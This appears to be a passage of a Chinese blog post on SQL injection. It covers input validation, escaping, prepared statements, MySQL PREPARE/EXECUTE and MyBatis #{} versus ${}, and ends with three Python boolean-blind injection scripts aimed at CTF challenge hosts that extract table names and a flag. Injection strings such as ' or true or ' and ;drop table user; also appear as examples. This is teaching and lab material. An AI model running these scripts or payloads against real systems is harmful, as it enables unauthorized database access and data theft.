<p> 如果你的SQL语句是类似where id={$id}这种形式,数据库里所有的id都是数字,那么就应该在SQL被执行前,检查确保变量id是int类型;如果是接受邮箱,那就应该检查并严格确保变量一定是邮箱的格式,其他的类型比如日期、时间等也是一个道理。总结起来:只要是有固定格式的变量,在SQL语句执行前,应该严格按照固定格式去检查,确保变量是我们预想的格式,这样很大程度上可以避免SQL注入攻击。<br> 比如,我们前面接受username参数例子中,我们的产品设计应该是在用户注册的一开始,就有一个用户名的规则,比如5-20个字符,只能由大小写字母、数字以及一些安全的符号组成,不包含特殊字符。此时我们应该有一个check_username的函数来进行统一的检查。不过,仍然有很多例外情况并不能应用到这一准则,比如文章发布系统,评论系统等必须要允许用户提交任意字符串的场景,这就需要采用过滤等其他方案了。</p>
<h3 id="2、过滤特殊符号" >
<a href="#2、过滤特殊符号" class="heading-link"><i class="fas fa-link"></i></a><a href="#2、过滤特殊符号" class="headerlink" title="2、过滤特殊符号"></a><strong>2、过滤特殊符号</strong></h3>
<p> 对于无法确定固定格式的变量,一定要进行特殊符号过滤或转义处理。但要清楚这只是兜底手段:上面 0x02 的绕过表已经说明,基于关键字/正则的黑名单过滤几乎总能被绕过(注释 <code>/**/</code>、<code>||</code>、<code>lpad</code>、<code>conv</code> 等替代写法层出不穷);转义必须使用数据库驱动提供的、与当前连接字符集绑定的函数(如 <code>mysqli_real_escape_string()</code>),而不是自己写 <code>addslashes</code>/<code>str_replace</code>,并且它不能替代下一节的参数化查询。</p>
<h3 id="3、绑定变量,使用预编译语句" >
<a href="#3、绑定变量,使用预编译语句" class="heading-link"><i class="fas fa-link"></i></a><a href="#3、绑定变量,使用预编译语句" class="headerlink" title="3、绑定变量,使用预编译语句"></a><strong>3、绑定变量,使用预编译语句</strong></h3>
<p> MySQL的mysqli驱动提供了预编译语句的支持(PDO 也支持,但 PDO 对 MySQL 默认开启 <code>ATTR_EMULATE_PREPARES</code>,即由驱动在客户端模拟预编译而不是真正的服务端预编译,需要时可显式设为 <code>false</code>),不同的程序语言,都分别有使用预编译语句的方法</p>
<p> 实际上,绑定变量使用预编译语句是预防SQL注入的最佳方式,使用预编译的SQL语句语义不会发生改变,在SQL语句中,变量用问号?表示,黑客即使本事再大,也无法改变SQL语句的结构。需要注意的是,占位符只能代替<strong>值</strong>,不能代替表名、列名这类标识符,也不能代替排序方向之类的关键字;这些位置如果需要动态决定,必须用白名单(代码中固定的合法候选集合)校验后再拼接,参见后文 MyBatis 的 <code>${}</code> 部分。</p>
<h2 id="etc2-预编译" >
<a href="#etc2-预编译" class="heading-link"><i class="fas fa-link"></i></a><a href="#etc2-预编译" class="headerlink" title="etc2 预编译"></a>etc2 预编译</h2>
<h3 id="1-什么是sql预编译" >
<a href="#1-什么是sql预编译" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-什么是sql预编译" class="headerlink" title="1 什么是sql预编译**"></a>1 什么是sql预编译**</h3>
<p>1.1:预编译语句是什么 </p>
<p>通常我们的一条sql在db接收到最终执行完毕返回可以分为下面三个过程:</p>
<ol>
<li>词法和语义解析 </li>
<li>优化sql语句,制定执行计划</li>
<li>执行并返回结果</li>
</ol>
<p>我们把这种普通语句称作Immediate Statements。 </p>
<p>但是很多情况,我们的一条sql语句可能会反复执行,或者每次执行的时候只有个别的值不同(比如query的where子句值不同,update的set子句值不同,insert的values值不同)。<br>如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等,则效率就明显不行了。</p>
<p> 所谓预编译语句就是将这类语句中的值用占位符替代,可以视为将sql语句模板化或者说参数化,一般称这类语句叫Prepared Statements或者Parameterized Statements<br> 预编译语句的优势在于归纳为:一次编译、多次运行,省去了解析优化等过程;此外预编译语句能防止sql注入。<br> 当然就优化来说,很多时候最优的执行计划不是光靠知道sql语句的模板就能决定了,往往就是需要通过具体值来预估出成本代价。</p>
<p>1.2: MySQL的预编译功能</p>
<p> <strong>注意MySQL的老版本(4.1之前)是不支持服务端预编译的,但基于目前业界生产环境普遍情况,基本可以认为MySQL支持服务端预编译。</strong></p>
<p> 下面我们来看一下MySQL中预编译语句的使用。<br> (1)建表 首先我们有一张测试表t,结构如下所示:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql> show create table t\G</span><br><span class="line">*************************** 1. row ***************************</span><br><span class="line"> Table: t</span><br><span class="line">Create Table: CREATE TABLE `t` (</span><br><span class="line"> `a` int(11) DEFAULT NULL,</span><br><span class="line"> `b` varchar(20) DEFAULT NULL,</span><br><span class="line"> UNIQUE KEY `ab` (`a`,`b`)</span><br><span class="line">) ENGINE=InnoDB DEFAULT CHARSET=utf8</span><br></pre></td></tr></table></div></figure>
<p> (2)编译</p>
<p> 我们接下来通过 <code>PREPARE stmt_name FROM preparable_stm</code>的语法来预编译一条sql语句</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql> prepare ins from 'insert into t select ?,?';</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br><span class="line">Statement prepared</span><br></pre></td></tr></table></div></figure>
<p> (3)执行</p>
<p> 我们通过<code>EXECUTE stmt_name [USING @var_name [, @var_name] ...]</code>的语法来执行预编译语句</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">mysql> set @a=999,@b='hello';</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br><span class="line"> </span><br><span class="line">mysql> execute ins using @a,@b;</span><br><span class="line">Query OK, 1 row affected (0.01 sec)</span><br><span class="line">Records: 1 Duplicates: 0 Warnings: 0</span><br><span class="line"> </span><br><span class="line">mysql> select * from t;</span><br><span class="line">+------+-------+</span><br><span class="line">| a | b |</span><br><span class="line">+------+-------+</span><br><span class="line">| 999 | hello |</span><br><span class="line">+------+-------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></div></figure>
<p> 可以看到,数据已经被成功插入表中。</p>
<p> MySQL中的预编译语句作用域是session级,但我们可以通过max_prepared_stmt_count变量来控制全局最大的存储的预编译语句。</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mysql> set @@global.max_prepared_stmt_count=1;</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br><span class="line"> </span><br><span class="line">mysql> prepare sel from 'select * from t';</span><br><span class="line">ERROR 1461 (42000): Can't create more than max_prepared_stmt_count statements (current value: 1)</span><br></pre></td></tr></table></div></figure>
<p>当预编译条数已经达到阈值时可以看到MySQL会报如上所示的错误。</p>
<p> (4)释放<br> 如果我们想要释放一条预编译语句,则可以使用<code>{DEALLOCATE | DROP} PREPARE stmt_name</code>的语法进行操作:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql> deallocate prepare ins;</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br></pre></td></tr></table></div></figure>
<h3 id="2:为什么PrepareStatement可以防止sql注入" >
<a href="#2:为什么PrepareStatement可以防止sql注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#2:为什么PrepareStatement可以防止sql注入" class="headerlink" title="2:为什么PrepareStatement可以防止sql注入"></a><strong>2:为什么PrepareStatement可以防止sql注入</strong></h3>
<p> 原理是采用了预编译的方法:先把带占位符的SQL模板交给数据库(或驱动)解析,再通过 <code>setString()</code>/<code>setInt()</code> 等方法为占位符绑定值。关键不在于 setString() 做了什么"安全检查",而在于绑定的值永远不会再进入SQL解析器:使用服务端预编译时参数通过二进制协议单独传输;使用客户端模拟预编译时(MySQL Connector/J 默认 <code>useServerPrepStmts=false</code>)由驱动按连接字符集转义后再拼入。两种情况下参数都只会被当作数据而不是语法,所以就避免了SQL注入的产生。下面具体分析</p>
<p> (1):为什么Statement会被sql注入</p>
<p> 因为Statement之所以会被sql注入是因为SQL语句结构发生了变化。比如:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">"select*from tablename where username='"+uesrname+ </span><br><span class="line">"'and password='"+password+"'"</span><br></pre></td></tr></table></div></figure>
<p> 在用户名处输入 <code>' or true or '</code> 之后,sql语句结构改变。</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select*from tablename where username=''or true or'' and password=''</span><br></pre></td></tr></table></div></figure>
<p> 这样本来是判断用户名和密码都匹配时才会计数,但是经过改变后变成了或的逻辑关系,不管用户名和密码是否匹配该式的返回值永远为true;</p>
<p> (2)为什么Preparement可以防止SQL注入。</p>
<p> 因为Preparement样式为</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select*from tablename where username=? and password=?</span><br></pre></td></tr></table></div></figure>
<p> 该SQL语句会在得到用户的输入之前先用数据库进行预编译,这样的话不管用户输入什么用户名和密码的判断始终都是并的逻辑关系,防止了SQL注入</p>
<p> 简单总结,参数化能防注入的原因在于,语句是语句,参数是参数,参数的值并不是语句的一部分,数据库只按语句的语义跑,至于跑的时候是带一个普通背包还是一个怪物,不会影响行进路线,无非跑的快点与慢点的区别。</p>
<hr>
<h3 id="3:mybatis是如何防止SQL注入的" >
<a href="#3:mybatis是如何防止SQL注入的" class="heading-link"><i class="fas fa-link"></i></a><a href="#3:mybatis是如何防止SQL注入的" class="headerlink" title="3:mybatis是如何防止SQL注入的"></a><strong>3:mybatis是如何防止SQL注入的</strong></h3>
<p> 1、首先看一下下面两个sql语句的区别:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap"></span><br><span class="line">select id, username, password, role</span><br><span class="line">from user</span><br><span class="line">where username = #{username,jdbcType=VARCHAR}</span><br><span class="line">and password = #{password,jdbcType=VARCHAR}</span><br><span class="line"></select></span><br></pre></td></tr></table></div></figure>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap"></span><br><span class="line">select id, username, password, role</span><br><span class="line">from user</span><br><span class="line">where username = ${username,jdbcType=VARCHAR}</span><br><span class="line">and password = ${password,jdbcType=VARCHAR}</span><br><span class="line"></select></span><br></pre></td></tr></table></div></figure>
<p><strong>mybatis中的#和$的区别:</strong></p>
<p> 1、<code>#{}</code> 会被 MyBatis 替换成 JDBC 的 <code>?</code> 占位符,传入的数据作为参数绑定,而不是拼进SQL文本(常见的"自动加引号"说法并不准确,见下文打印出的SQL)。<br>如:where username=#{username},无论传入 111 还是 id,解析出的sql都是 where username=?,值在执行时单独传给数据库。<br> 2、<code>${}</code> 将传入的数据直接拼接生成在sql中。<br>如:where username=${username},如果传入的值是111,那么解析成sql时的值为where username=111;<br>如果传入的值是 <code>;drop table user;</code>,则解析成的sql为:select id, username, password, role from user where username=;drop table user;<br> 3、#方式能够很大程度防止sql注入,$方式无法防止Sql注入。<br> 4、$方式一般用于传入数据库对象,例如传入表名、列名、排序字段。<br> 5、一般能用#的就别用$,若不得不使用"${xxx}"这样的参数,不要依赖黑名单过滤,而要做白名单校验:把传入值与代码中固定的合法表名/列名集合比对,不在集合内就直接拒绝。<br> 6、在MyBatis中,"${xxx}"这样格式的参数会直接参与SQL拼接,从而不能避免注入攻击。但涉及到动态表名和列名时,只能使用"${xxx}"这样的参数格式。所以,这样的参数需要我们在代码中按白名单处理来防止注入。<br>【结论】在编写MyBatis的映射语句时,尽量采用"#{xxx}"这样的格式。若不得不使用"${xxx}"这样的参数,要按白名单做好校验,来防止SQL注入攻击。</p>
<h3 id="4-mybatis是如何做到防止sql注入的" >
<a href="#4-mybatis是如何做到防止sql注入的" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-mybatis是如何做到防止sql注入的" class="headerlink" title="4 mybatis是如何做到防止sql注入的"></a>4 mybatis是如何做到防止sql注入的</h3>
<p> MyBatis框架作为一款半自动化的持久层框架,其SQL语句都要我们自己手动编写,这个时候当然需要防止SQL注入。其实,MyBatis的SQL是一个具有“<strong>输入+输出</strong>”的功能,类似于函数的结构,参考上面的两个例子。其中,parameterType表示了输入的参数类型,resultType表示了输出的参数类型。回应上文,如果我们想防止SQL注入,理所当然地要在输入参数上下功夫。上面代码中使用#的即输入参数在SQL中拼接的部分,传入参数后,打印出执行的SQL语句,会看到SQL是这样的:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select id, username, password, role from user where username=? and password=?</span><br></pre></td></tr></table></div></figure>
<p> 不管输入什么参数,打印出的SQL都是这样的。这是因为MyBatis启用了预编译功能,在SQL执行前,会先将上面的SQL发送给数据库进行编译;执行时,直接使用编译好的SQL,把参数值绑定到占位符"?"上就可以了。SQL注入的本质是让输入改变语句的语法结构,而结构在解析阶段就已经固定、参数在解析之后才绑定,所以这样的方式就很好地避免了SQL注入的问题。</p>
<p> 【底层实现原理】MyBatis是如何做到SQL预编译的呢?其实在框架底层,是JDBC中的PreparedStatement在起作用,PreparedStatement是我们很熟悉的Statement的子接口(<code>PreparedStatement extends Statement</code>),它的对象包含了编译好的SQL语句。这种"准备好"的方式不仅能提高安全性,而且在多次执行同一个SQL时,能够提高效率。原因是SQL已编译好,再次执行时无需再编译</p>
<h2 id="脚本" >
<a href="#脚本" class="heading-link"><i class="fas fa-link"></i></a><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h2>
<h3 id="sql布尔盲注" >
<a href="#sql布尔盲注" class="heading-link"><i class="fas fa-link"></i></a><a href="#sql布尔盲注" class="headerlink" title="sql布尔盲注"></a>sql布尔盲注</h3>
<p>说明:下面几段脚本都是针对具体靶场写的,复用前注意几点。第一段缺少 <code>import requests</code>;其中 <code>table()</code> 里的 <code>u=id="||..."</code> 是链式赋值,把同一字符串同时赋给了 <code>u</code> 和 <code>id</code>(覆盖了内置函数),写成 <code>u = "||..."</code> 即可;<code>db()</code>/<code>table()</code> 命中字符后没有 <code>break</code>,每一位都会把剩余 ASCII 范围跑完,第二段脚本中命中即 <code>break</code> 的写法才是对的。判定依据都是响应里的特定字符串(<code>By Rudyard Kipling</code>、<code>I asked nothing</code>),换目标时要先确认真/假页面之间稳定的差异。</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">url = <span class="string">"http://124.156.121.112:28069/?id=-1'/**/"</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">db</span>(<span class="params">url</span>):</span> <span class="comment">#爆库名</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>,<span class="number">128</span>):</span><br><span class="line"> u= <span class="string">"or/**/ascii(substr(database()/**/from/**/"</span>+<span class="built_in">str</span>(i)+<span class="string">"/**/for/**/1))="</span>+<span class="built_in">str</span>(j)+<span class="string">"#"</span></span><br><span class="line"> s = url+u</span><br><span class="line"> <span class="built_in">print</span>(s)</span><br><span class="line"> r = requests.get(s)</span><br><span class="line"> <span 
class="keyword">if</span> <span class="string">'By Rudyard Kipling'</span> <span class="keyword">in</span> r.text:</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">chr</span>(j))</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">table</span>(<span class="params">url</span>):</span> <span class="comment">#爆表名</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line"> table_name=<span class="string">''</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>,<span class="number">128</span>):</span><br><span class="line"> u=<span class="built_in">id</span>=<span class="string">"||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"</span>+<span class="built_in">str</span>(i)+<span class="string">")/**/from/**/"</span>+<span class="built_in">str</span>(j)+<span class="string">"/**/for/**/1))="</span>+<span class="built_in">str</span>(k)+<span class="string">"#"</span></span><br><span class="line"> s = url+u</span><br><span class="line"> <span class="built_in">print</span>(s)</span><br><span class="line"> r = requests.get(s) </span><br><span class="line"> <span class="keyword">if</span> <span class="string">'By Rudyard Kipling'</span> <span class="keyword">in</span> r.text:</span><br><span class="line"> table_name+=<span class="built_in">chr</span>(k)</span><br><span class="line"> <span 
class="built_in">print</span>(table_name)</span><br></pre></td></tr></table></div></figure>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">s=requests.session()</span><br><span class="line">url=<span class="string">'https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'</span></span><br><span class="line">table=<span class="string">""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">45</span>):</span><br><span class="line"> <span class="built_in">print</span>(i)</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">31</span>,<span class="number">128</span>):</span><br><span class="line"> <span class="comment">#爆表名 flag</span></span><br><span class="line"> payload = <span class="string">"ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"</span>%(<span class="built_in">str</span>(i),<span 
class="built_in">str</span>(j))</span><br><span class="line"> <span class="comment">#爆字段名 flag</span></span><br><span class="line"> <span class="comment">#payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))</span></span><br><span class="line"> <span class="comment">#读取flag</span></span><br><span class="line"> <span class="comment">#payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))</span></span><br><span class="line"></span><br><span class="line"> ra = s.get(url=url + <span class="string">'?id=0/**/or/**/'</span> + payload).text</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'I asked nothing'</span> <span class="keyword">in</span> ra:</span><br><span class="line"> table += <span class="built_in">chr</span>(j)</span><br><span class="line"> <span class="built_in">print</span>(table)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">s=requests.session()</span><br><span class="line">url=<span class="string">'http://ab7573d3-1de2-42bd-bc68-26aaca8af4dc.chall.ctf.show/index.php'</span></span><br><span class="line">table=<span class="string">""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">45</span>):</span><br><span class="line"> <span class="built_in">print</span>(i)</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">31</span>,<span class="number">128</span>):</span><br><span class="line"> <span class="comment">#爆表名 flag</span></span><br><span class="line"> <span class="comment">#payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))</span></span><br><span class="line"> <span class="comment">#爆字段名 
flag</span></span><br><span class="line"> <span class="comment">#payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))</span></span><br><span class="line"> <span class="comment">#读取flag</span></span><br><span class="line"> payload = <span class="string">"ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"</span>%(<span class="built_in">str</span>(i), <span class="built_in">str</span>(j))</span><br><span class="line"></span><br><span class="line"> ra = s.get(url=url + <span class="string">'?id=0/**/or/**/'</span> + payload).text</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'I asked nothing'</span> <span class="keyword">in</span> ra:</span><br><span class="line"> table += <span class="built_in">chr</span>(j)</span><br><span class="line"> <span class="built_in">print</span>(table)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
</div></div></article><article class="postlist-item post"><header class="post-header"><h1 class="post-title"><a class="post-title__link" href="/2021/12/01/hello-world/">Hello World</a></h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2021-12-01</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2021-12-01</span></span></div></header><div class="post-body"><div class="post-excerpt"><p>Welcome to <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/" >Hexo</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>! This is your very first post. Check <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/" >documentation</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> for more info. If you get any problems when using Hexo, you can find the answer in <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/troubleshooting.html" >troubleshooting</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> or you can ask me on <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://github.com/hexojs/hexo/issues" >GitHub</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>.</p>
<h2 id="Quick-Start" >
<a href="#Quick-Start" class="heading-link"><i class="fas fa-link"></i></a><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2>
<h3 id="Create-a-new-post" >
<a href="#Create-a-new-post" class="heading-link"><i class="fas fa-link"></i></a><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></div></figure>
<p>More info: <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/writing.html" >Writing</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<h3 id="Run-server" >
<a href="#Run-server" class="heading-link"><i class="fas fa-link"></i></a><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></div></figure>
<p>More info: <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/server.html" >Server</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<h3 id="Generate-static-files" >
<a href="#Generate-static-files" class="heading-link"><i class="fas fa-link"></i></a><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></div></figure>
<p>More info: <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/generating.html" >Generating</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<h3 id="Deploy-to-remote-sites" >
<a href="#Deploy-to-remote-sites" class="heading-link"><i class="fas fa-link"></i></a><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></div></figure>
<p>More info: <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://hexo.io/docs/one-command-deployment.html" >Deployment</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
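</div></div></article></section><nav class="paginator"><div class="paginator-inner"><span class="page-number current">1</span></div></nav></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><section class="sidebar-toc hide"></section><!-- ov = overview--><section class="sidebar-ov"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/stun-logo.svg" alt="avatar"></div><p class="sidebar-ov-author__text">hello world</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">2</div><div class="sidebar-ov-state-item__name">Archives</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><!-- alt describes the link destination, since the image is the only link content --><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons BY-NC-SA 4.0 license"></a></div></section></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>John Doe</span></div><div><span>Powered by <a href="https://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v5.4.0</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div>
<!-- Third-party scripts are fetched from a public CDN with no Subresource Integrity.
     Each tag below should carry integrity="sha384-<HASH_PLACEHOLDER>" crossorigin="anonymous",
     with the hash computed from the exact pinned file, so a modified CDN response is refused
     by the browser instead of executed. Load order (jQuery, then velocity, then theme scripts)
     is significant and is kept unchanged. -->
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/[email protected]/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/[email protected]/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>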